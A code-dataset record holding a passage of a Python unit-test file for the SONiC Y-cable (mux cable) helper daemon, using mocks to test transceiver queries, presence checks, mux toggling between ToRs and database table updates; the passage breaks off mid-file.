hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b2f0f9a0add098676f5dc4d4ab925ec501162c2a
| 244,095
|
py
|
Python
|
sonic-ycabled/tests/test_y_cable_helper.py
|
itamar-talmon/sonic-platform-daemons
|
9ac12bfb406416b0fb3b03a084d8179bdc53f3a6
|
[
"Apache-2.0"
] | null | null | null |
sonic-ycabled/tests/test_y_cable_helper.py
|
itamar-talmon/sonic-platform-daemons
|
9ac12bfb406416b0fb3b03a084d8179bdc53f3a6
|
[
"Apache-2.0"
] | null | null | null |
sonic-ycabled/tests/test_y_cable_helper.py
|
itamar-talmon/sonic-platform-daemons
|
9ac12bfb406416b0fb3b03a084d8179bdc53f3a6
|
[
"Apache-2.0"
] | null | null | null |
from .mock_swsscommon import Table
from sonic_platform_base.sfp_base import SfpBase
from swsscommon import swsscommon
from sonic_py_common import daemon_base
from ycable.ycable_utilities.y_cable_helper import *
from ycable.ycable import *
import copy
import os
import sys
import time
if sys.version_info >= (3, 3):
from unittest.mock import MagicMock, patch
else:
from mock import MagicMock, patch
daemon_base.db_connect = MagicMock()
swsscommon.Table = MagicMock()
sys.modules['sonic_y_cable'] = MagicMock()
sys.modules['sonic_y_cable.y_cable'] = MagicMock()
os.environ["Y_CABLE_HELPER_UNIT_TESTING"] = "1"
class helper_logger:
mock_arg = MagicMock()
def log_error(self, mock_arg):
return True
def log_warning(self, mock_arg):
return True
def log_debug(self, mock_arg):
return True
class TestYCableScript(object):
def test_xcvrd_helper_class_run(self):
Y_cable_task = YCableTableUpdateTask()
def test_y_cable_helper_format_mapping_identifier1(self):
rc = format_mapping_identifier("ABC ")
assert(rc == "abc")
def test_y_cable_helper_format_mapping_identifier_no_instance(self):
rc = format_mapping_identifier(None)
assert(rc == None)
def test_gather_arg_from_db_and_check_for_type(self):
arg_tbl = {"Ethernet0": (True, {"abc": "x", "def": "y"})}
dic = {"key": "value"}
rc = gather_arg_from_db_and_check_for_type(
arg_tbl, "Ethernet0", "key", dic, "abc")
assert(rc == ("x", "value", {'abc': 'x', 'def': 'y'}))
def test_gather_arg_from_db_and_check_for_none_type(self):
arg_tbl = {"Ethernet0": (True, {"abcd": "x", "def": "y"})}
dic = {"key": "value"}
rc = gather_arg_from_db_and_check_for_type(
arg_tbl, "Ethernet0", "key", dic, "abc")
assert(rc == (None, "value"), {'abcd': 'x', 'def': 'y'})
def test_y_cable_wrapper_get_transceiver_info(self):
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.get_transceiver_info_dict.return_value = {'manufacturer': 'Microsoft',
'model': 'model1'}
transceiver_dict = y_cable_wrapper_get_transceiver_info(1)
vendor = transceiver_dict.get('manufacturer')
model = transceiver_dict.get('model')
assert(vendor == "Microsoft")
assert(model == "model1")
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_chassis')
def test_y_cable_wrapper_get_transceiver_info_with_platform_chassis(self, mock_chassis):
mock_object = MagicMock()
mock_object.get_transceiver_info.return_value = {'type': '1000_BASE_SX_SFP',
'hardware_rev': '5',
'serial': 'PEP3L5D',
'manufacturer': 'FINISAR',
'model': 'ABC',
'connector': 'LC',
'encoding': '8B10B',
'ext_identifier': 'SFP',
'ext_rateselect_compliance': 'DEF',
'cable_length': '850',
'nominal_bit_rate': '100',
'specification_compliance': 'GHI',
'vendor_date': '2021-01-01',
'vendor_oui': '00:90:65'}
mock_chassis.get_sfp = MagicMock(return_value=mock_object)
received_xcvr_info = y_cable_wrapper_get_transceiver_info(1)
type = received_xcvr_info.get('type')
model = received_xcvr_info.get('model')
vendor_date = received_xcvr_info.get('vendor_date')
assert(type == "1000_BASE_SX_SFP")
assert(model == "ABC")
assert(vendor_date == "2021-01-01")
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_chassis')
def test_y_cable_wrapper_get_transceiver_info_with_platform_chassis_not_implemented(self, mock_chassis):
mock_object = MagicMock()
mock_object.get_transceiver_info.side_effect = NotImplementedError
mock_chassis.get_sfp = MagicMock(return_value=mock_object)
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.get_transceiver_info_dict.return_value = {'manufacturer': 'microsoft',
'model': 'simulated'}
transceiver_dict = y_cable_wrapper_get_transceiver_info(1)
vendor = transceiver_dict.get('manufacturer')
model = transceiver_dict.get('model')
assert(vendor == "microsoft")
assert(model == "simulated")
def test_y_cable_wrapper_get_presence(self):
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.get_presence.return_value = True
presence = y_cable_wrapper_get_presence(1)
assert(presence == True)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_chassis')
def test_y_cable_wrapper_get_presence_with_platform_chassis(self, mock_chassis):
mock_object = MagicMock()
mock_object.get_presence = MagicMock(return_value=True)
mock_chassis.get_sfp = MagicMock(return_value=mock_object)
presence = y_cable_wrapper_get_presence(1)
assert(presence == True)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_chassis')
def test_y_cable_wrapper_get_presence_with_platform_chassis_raise_exception(self, mock_chassis):
mock_object = MagicMock(spec=SfpBase)
mock_object.get_presence = MagicMock(side_effect=NotImplementedError)
mock_chassis.get_sfp = MagicMock(return_value=mock_object)
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.get_presence.return_value = True
assert(y_cable_wrapper_get_presence(1) == True)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.get_muxcable_info', MagicMock(return_value={'tor_active': 'self',
'mux_direction': 'self',
'manual_switch_count': '7',
'auto_switch_count': '71',
'link_status_self': 'up',
'link_status_peer': 'up',
'link_status_nic': 'up',
'nic_lane1_active': 'True',
'nic_lane2_active': 'True',
'nic_lane3_active': 'True',
'nic_lane4_active': 'True',
'self_eye_height_lane1': '500',
'self_eye_height_lane2': '510',
'peer_eye_height_lane1': '520',
'peer_eye_height_lane2': '530',
'nic_eye_height_lane1': '742',
'nic_eye_height_lane2': '750',
'internal_temperature': '28',
'internal_voltage': '3.3',
'nic_temperature': '20',
'nic_voltage': '2.7',
'version_nic_active': '1.6MS',
'version_nic_inactive': '1.7MS',
'version_nic_next': '1.7MS',
'version_self_active': '1.6MS',
'version_self_inactive': '1.7MS',
'version_self_next': '1.7MS',
'version_peer_active': '1.6MS',
'version_peer_inactive': '1.7MS',
'version_peer_next': '1.7MS'}))
def test_post_port_mux_info_to_db(self):
logical_port_name = "Ethernet0"
mux_tbl = Table("STATE_DB", "Y_CABLE_INFO_TABLE")
rc = post_port_mux_info_to_db(logical_port_name, mux_tbl)
assert(rc != -1)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.get_muxcable_static_info', MagicMock(return_value={'read_side': 'self',
'nic_lane1_precursor1': '1',
'nic_lane1_precursor2': '-7',
'nic_lane1_maincursor': '-1',
'nic_lane1_postcursor1': '11',
'nic_lane1_postcursor2': '11',
'nic_lane2_precursor1': '12',
'nic_lane2_precursor2': '7',
'nic_lane2_maincursor': '7',
'nic_lane2_postcursor1': '7',
'nic_lane2_postcursor2': '7',
'tor_self_lane1_precursor1': '17',
'tor_self_lane1_precursor2': '17',
'tor_self_lane1_maincursor': '17',
'tor_self_lane1_postcursor1': '17',
'tor_self_lane1_postcursor2': '17',
'tor_self_lane2_precursor1': '7',
'tor_self_lane2_precursor2': '7',
'tor_self_lane2_maincursor': '7',
'tor_self_lane2_postcursor1': '7',
'tor_self_lane2_postcursor2': '7',
'tor_peer_lane1_precursor1': '7',
'tor_peer_lane1_precursor2': '7',
'tor_peer_lane1_maincursor': '17',
'tor_peer_lane1_postcursor1': '7',
'tor_peer_lane1_postcursor2': '17',
'tor_peer_lane2_precursor1': '7',
'tor_peer_lane2_precursor2': '7',
'tor_peer_lane2_maincursor': '17',
'tor_peer_lane2_postcursor1': '7',
'tor_peer_lane2_postcursor2': '17'}))
def test_post_port_mux_static_info_to_db(self):
logical_port_name = "Ethernet0"
mux_tbl = Table("STATE_DB", "Y_CABLE_STATIC_INFO_TABLE")
rc = post_port_mux_static_info_to_db(logical_port_name, mux_tbl)
assert(rc != -1)
def test_y_cable_helper_format_mapping_identifier1(self):
rc = format_mapping_identifier("ABC ")
assert(rc == "abc")
def test_y_cable_helper_format_mapping_identifier_no_instance(self):
rc = format_mapping_identifier(None)
assert(rc == None)
def test_y_cable_wrapper_get_transceiver_info(self):
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.get_transceiver_info_dict.return_value = {'manufacturer': 'Microsoft',
'model': 'model1'}
transceiver_dict = y_cable_wrapper_get_transceiver_info(1)
vendor = transceiver_dict.get('manufacturer')
model = transceiver_dict.get('model')
assert(vendor == "Microsoft")
assert(model == "model1")
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_chassis')
def test_y_cable_wrapper_get_transceiver_info_with_platform_chassis(self, mock_chassis):
mock_object = MagicMock()
mock_object.get_transceiver_info.return_value = {'type': '1000_BASE_SX_SFP',
'hardware_rev': '5',
'serial': 'PEP3L5D',
'manufacturer': 'FINISAR',
'model': 'ABC',
'connector': 'LC',
'encoding': '8B10B',
'ext_identifier': 'SFP',
'ext_rateselect_compliance': 'DEF',
'cable_length': '850',
'nominal_bit_rate': '100',
'specification_compliance': 'GHI',
'vendor_date': '2021-01-01',
'vendor_oui': '00:90:65'}
mock_chassis.get_sfp = MagicMock(return_value=mock_object)
received_xcvr_info = y_cable_wrapper_get_transceiver_info(1)
type = received_xcvr_info.get('type')
model = received_xcvr_info.get('model')
vendor_date = received_xcvr_info.get('vendor_date')
assert(type == "1000_BASE_SX_SFP")
assert(model == "ABC")
assert(vendor_date == "2021-01-01")
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_chassis')
def test_y_cable_wrapper_get_transceiver_info_with_platform_chassis_not_implemented(self, mock_chassis):
mock_object = MagicMock()
mock_object.get_transceiver_info.side_effect = NotImplementedError
mock_chassis.get_sfp = MagicMock(return_value=mock_object)
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.get_transceiver_info_dict.return_value = {'manufacturer': 'microsoft',
'model': 'simulated'}
transceiver_dict = y_cable_wrapper_get_transceiver_info(1)
vendor = transceiver_dict.get('manufacturer')
model = transceiver_dict.get('model')
assert(vendor == "microsoft")
assert(model == "simulated")
def test_y_cable_wrapper_get_presence(self):
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.get_presence.return_value = True
presence = y_cable_wrapper_get_presence(1)
assert(presence == True)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_chassis')
def test_y_cable_wrapper_get_presence_with_platform_chassis(self, mock_chassis):
mock_object = MagicMock()
mock_object.get_presence = MagicMock(return_value=True)
mock_chassis.get_sfp = MagicMock(return_value=mock_object)
presence = y_cable_wrapper_get_presence(1)
assert(presence == True)
def test_y_cable_toggle_mux_torA_update_status_true(self):
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
mock_toggle_object = MagicMock()
mock_toggle_object.toggle_mux_to_tor_a.return_value = True
patched_util.get.return_value = mock_toggle_object
rc = y_cable_toggle_mux_torA(1)
assert(rc == 1)
def test_y_cable_toggle_mux_torA_no_port_instance(self):
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as port_instance:
port_instance.get.return_value = None
rc = y_cable_toggle_mux_torA(1)
assert(rc == -1)
def test_y_cable_toggle_mux_torA_update_status_exception(self):
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as port_instance:
port_instance.get.return_value = "simulated_port"
port_instance.toggle_mux_to_tor_a.return_value = Exception(
NotImplementedError)
rc = y_cable_toggle_mux_torA(1)
assert(rc == -1)
def test_y_cable_toggle_mux_torA_update_status_true(self):
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
mock_toggle_object = MagicMock()
mock_toggle_object.toggle_mux_to_tor_a.return_value = True
patched_util.get.return_value = mock_toggle_object
rc = y_cable_toggle_mux_torA(1)
assert(rc == 1)
def test_y_cable_toggle_mux_torB_no_port_instance(self):
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as port_instance:
port_instance.get.return_value = None
rc = y_cable_toggle_mux_torB(1)
assert(rc == -1)
def test_y_cable_toggle_mux_torB_update_status_exception(self):
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as port_instance:
port_instance.get.return_value = "simulated_port"
port_instance.toggle_mux_to_tor_a.return_value = Exception(
NotImplementedError)
rc = y_cable_toggle_mux_torB(1)
assert(rc == -1)
def test_y_cable_toggle_mux_torB_update_status_true(self):
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
mock_toggle_object = MagicMock()
mock_toggle_object.toggle_mux_to_tor_b.return_value = True
patched_util.get.return_value = mock_toggle_object
rc = y_cable_toggle_mux_torB(1)
assert(rc == 2)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
def test_update_tor_active_side_1_active(self):
read_side = 1
state = "active"
logical_port_name = "Ethernet0"
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
mock_toggle_object = MagicMock()
mock_toggle_object.toggle_mux_to_tor_a.return_value = True
patched_util.get.return_value = mock_toggle_object
rc = update_tor_active_side(read_side, state, logical_port_name)
assert(rc == (1, 1))
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
def test_update_tor_active_side_2_active(self):
read_side = 2
state = "active"
logical_port_name = "Ethernet0"
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
mock_toggle_object = MagicMock()
mock_toggle_object.toggle_mux_to_tor_b.return_value = True
patched_util.get.return_value = mock_toggle_object
rc = update_tor_active_side(read_side, state, logical_port_name)
assert(rc == (2,2))
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
def test_update_tor_active_side_1_standby(self):
read_side = 1
state = "standby"
logical_port_name = "Ethernet0"
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
mock_toggle_object = MagicMock()
mock_toggle_object.toggle_mux_to_tor_b.return_value = True
patched_util.get.return_value = mock_toggle_object
rc = update_tor_active_side(read_side, state, logical_port_name)
assert(rc == (2,1))
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
def test_update_tor_active_side_2_standby(self):
read_side = 2
state = "standby"
logical_port_name = "Ethernet0"
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
mock_toggle_object = MagicMock()
mock_toggle_object.toggle_mux_to_tor_a.return_value = True
patched_util.get.return_value = mock_toggle_object
rc = update_tor_active_side(read_side, state, logical_port_name)
assert(rc == (1,2))
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=False))
def test_update_tor_active_side_no_cable_presence(self):
read_side = 1
state = "active"
logical_port_name = "Ethernet0"
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
mock_toggle_object = MagicMock()
mock_toggle_object.toggle_mux_to_tor_a.return_value = True
patched_util.get.return_value = mock_toggle_object
rc = update_tor_active_side(read_side, state, logical_port_name)
assert(rc == (-1,-1))
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0, 1, 2]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=False))
def test_update_tor_active_side_multiple_mappings(self):
read_side = 1
state = "active"
logical_port_name = "Ethernet0"
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
mock_toggle_object = MagicMock()
mock_toggle_object.toggle_mux_to_tor_a.return_value = True
patched_util.get.return_value = mock_toggle_object
rc = update_tor_active_side(read_side, state, logical_port_name)
assert(rc == (-1,-1))
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
def test_update_tor_active_side_with_read_update(self):
read_side = -1
state = "active"
logical_port_name = "Ethernet0"
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
mock_toggle_object = MagicMock()
mock_toggle_object.toggle_mux_to_tor_a.return_value = True
mock_toggle_object.get_read_side.return_value = 1
patched_util.get.return_value = mock_toggle_object
rc = update_tor_active_side(read_side, state, logical_port_name)
assert(rc == (1, 1))
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
def test_update_tor_active_side_with_read_update(self):
read_side = -1
state = "active"
logical_port_name = "Ethernet0"
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
mock_toggle_object = MagicMock()
mock_toggle_object.toggle_mux_to_tor_b.return_value = True
mock_toggle_object.get_read_side.return_value = 2
patched_util.get.return_value = mock_toggle_object
rc = update_tor_active_side(read_side, state, logical_port_name)
assert(rc == (2, 1))
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
def test_update_tor_active_side_with_read_update(self):
read_side = -1
state = "active"
logical_port_name = "Ethernet0"
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
mock_toggle_object = MagicMock()
mock_toggle_object.toggle_mux_to_tor_b.return_value = True
mock_toggle_object.get_read_side.return_value = -1
patched_util.get.return_value = mock_toggle_object
rc = update_tor_active_side(read_side, state, logical_port_name)
assert(rc == (-1, -1))
def test_get_mux_cable_info_without_presence(self):
rc = get_muxcable_info_without_presence()
assert(rc['tor_active'] == 'unknown')
assert(rc['mux_direction'] == 'unknown')
assert(rc['manual_switch_count'] == 'N/A')
assert(rc['auto_switch_count'] == 'N/A')
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
def test_get_ycable_physical_port_from_logical_port(self):
instance = get_ycable_physical_port_from_logical_port("Ethernet0")
assert(instance == 0)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=False))
def test_get_ycable_physical_port_from_logical_port_physical_port_not_present(self):
instance = get_ycable_physical_port_from_logical_port("Ethernet0")
assert(instance == -1)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value={}))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=False))
def test_get_ycable_physical_port_from_logical_port_physical_port_list_empty(self):
instance = get_ycable_physical_port_from_logical_port("Ethernet0")
assert(instance == -1)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
def test_get_ycable_port_instance_from_logical_port(self):
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
patched_util.get.return_value = 0
instance = get_ycable_port_instance_from_logical_port("Ethernet0")
assert(instance == 0)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=False))
def test_get_ycable_port_instance_from_logical_port_no_presence(self):
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
patched_util.get.return_value = 0
instance = get_ycable_port_instance_from_logical_port("Ethernet0")
assert(instance == PORT_INSTANCE_ERROR)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
def test_get_ycable_port_instance_from_logical_port_no_port_instance(self):
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
def mock_get():
pass
patched_util.get.return_value = mock_get()
instance = get_ycable_port_instance_from_logical_port("E")
assert(instance == PORT_INSTANCE_ERROR)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0, 1, 2]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
def test_get_ycable_port_instance_from_logical_port_multiple_mapping(self):
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
patched_util.get.return_value = 0
instance = get_ycable_port_instance_from_logical_port("Ethernet0")
assert(instance == -1)
def test_update_table_mux_status_for_response_tbl(self):
asic_index = 0
appl_db = "TEST_DB"
logical_port_name = "Ethernet0"
status = "standby"
test_table = swsscommon.Table(appl_db[asic_index], "XCVRD_TEST_TABLE")
update_table_mux_status_for_response_tbl(
test_table, status, logical_port_name)
rc = test_table.get(logical_port_name)
# Since the table class is mocked, the most we can test for is that get doesn't return None
assert(type(rc) != None)
def test_set_result_and_delete_port(self):
result = "result"
actual_result = "pass"
appl_db = "TEST_DB"
port = 0
command_table = swsscommon.Table(appl_db[0], "XCVRD_COMMAND_TABLE")
response_table = swsscommon.Table(appl_db[1], "XCVRD_RESPONSE_TABLE")
rc = set_result_and_delete_port(
result, actual_result, command_table, response_table, port)
assert(rc == None)
def test_delete_port_from_y_cable_table(self):
logical_port_name = "Ethernet0"
appl_db = "TEST_DB"
y_cable_tbl = swsscommon.Table(appl_db[0], "XCVRD_Y_CBL_TABLE")
rc = delete_port_from_y_cable_table(logical_port_name, y_cable_tbl)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
def test_update_appdb_port_mux_cable_response_table_port_instance_none(self):
asic_index = 0
appl_db = "TEST_DB"
logical_port_name = "Ethernet0"
read_side = 1
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
def mock_get():
pass
patched_util.get.return_value = mock_get()
rc = update_appdb_port_mux_cable_response_table(
logical_port_name, asic_index, appl_db, read_side)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
def test_update_appdb_port_mux_cable_response_table_read_side_none(self):
asic_index = 0
appl_db = "TEST_DB"
logical_port_name = "Ethernet0"
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
def mock_read_side():
pass
read_side = mock_read_side()
patched_util.get.return_value = 0
rc = update_appdb_port_mux_cable_response_table(
logical_port_name, asic_index, appl_db, read_side)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
